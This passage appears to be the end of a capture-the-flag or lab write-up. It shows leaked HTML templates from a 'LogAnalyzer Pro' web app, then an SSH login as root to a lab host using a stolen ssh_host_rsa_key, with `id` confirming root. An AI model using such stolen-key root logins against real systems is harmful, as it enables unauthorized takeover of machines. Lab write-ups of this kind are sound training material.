<nav class="navbar navbar-expand-lg navbar-dark bg-dark mb-4">
<div class="container">
<a class="navbar-brand" href="/dashboard">LogAnalyzer Pro v1.0</a>
.......................................
.......................................
.......................................
.......................................
templates/login.html: </div>
templates/login.html: <div class="mb-3">
templates/login.html: <label for="password" class="form-label">Password</label>
templates/login.html: <input type="password" class="form-control" id="password" name="password" required>
templates/login.html: </div>
templates/login.html: <button type="submit" class="btn btn-primary w-100">Iniciar Sesión</button>
templates/login.html: </form>
templates/login.html: </div>
templates/login.html: </div>
templates/login.html: </div>
templates/login.html:</body>
templates/login.html:</html>
</code></pre>
</div>
</div>
</div>
</div>
</div>
</div>
<script src="https://cdn.jsdelivr.net/npm/bootstrap@5.3.2/dist/js/bootstrap.bundle.min.js"></script>
</body>
</html>
Once that succeeded, SSH in directly as root and it's done
┌──(root㉿kali)-[/etc/ssh]
└─# ssh root@192.168.81.61 -i ssh_host_rsa_key
** WARNING: connection is not using a post-quantum key exchange algorithm.
** This session may be vulnerable to "store now, decrypt later" attacks.
** The server may need to be upgraded. See https://openssh.com/pq.html
Welcome to Ubuntu 20.04.6 LTS (GNU/Linux 5.15.0-139-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

 * Introducing Expanded Security Maintenance for Applications.
   Receive updates to over 25,000 software packages with your
   Ubuntu Pro subscription. Free for personal use.

     https://ubuntu.com/pro

Expanded Security Maintenance for Infrastructure is not enabled.

0 updates can be applied immediately.

Enable ESM Infra to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status

The list of available updates is more than a week old.
To check for new updates run: sudo apt update
New release '22.04.5 LTS' available.
Run 'do-release-upgrade' to upgrade to it.

Your Hardware Enablement Stack (HWE) is supported until April 2025.
Last login: Sat Jan 3 09:44:05 2026 from 192.168.81.26
root@cuentos:~# id
uid=0(root) gid=0(root) groups=0(root)
And that's the end!